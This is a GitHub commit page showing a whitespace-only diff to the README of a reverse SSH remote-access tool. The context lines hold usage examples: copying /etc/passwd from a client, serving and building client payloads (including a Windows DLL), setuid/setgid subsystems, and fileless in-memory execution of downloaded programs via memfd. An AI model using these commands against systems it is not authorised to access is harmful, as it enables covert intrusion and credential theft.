Skip to content

Commit d378d6a

Browse files
Fixed some extremely minor formatting issues in README (#190)
1 parent ace67bf commit d378d6a

File tree

1 file changed

+5
-3
lines changed

1 file changed

+5
-3
lines changed

README.md

Lines changed: 5 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -148,7 +148,6 @@ ssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine
148148

149149
# SCP
150150
scp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .
151-
152151
```
153152

154153
## Sponsors
@@ -239,7 +238,6 @@ This requires the web server component has been enabled.
239238
# Generate a client and serve it on a named link
240239
catcher$ link --name test
241240
http://your.rssh.server.internal:3232/test
242-
243241
```
244242
245243
Then you can download it as follows:
@@ -331,7 +329,6 @@ http://your.rssh.server.internal:3232/windows_dll
331329
332330
# If building manually
333331
CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll
334-
335332
```
336333
337334
### SSH Subsystems
@@ -340,11 +337,15 @@ The SSH protocol supports calling subsystems with the `-s` flag. In RSSH this is
340337
341338
342339
#### All
340+
343341
`list` Lists avaiable subsystem
342+
344343
`sftp`: Runs the sftp handler to transfer files
345344
346345
#### Linux
346+
347347
`setgid`: Attempt to change group
348+
348349
`setuid`: Attempt to change user
349350
350351
#### Windows
@@ -431,6 +432,7 @@ ssh -J your.rssh.server:3232 <rssh_client_id> https://your.host/program
431432
`http/https`: Pure web downloading
432433
433434
`rssh`: Download via the rssh server
435+
434436
The rssh server will serve content from the `downloads` directory in the executables working directory.
435437
436438
Both of these methods will opportunistically use [memfd](https://man7.org/linux/man-pages/man2/memfd_create.2.html) which will not write any executables to disk.

0 commit comments

Comments
 (0)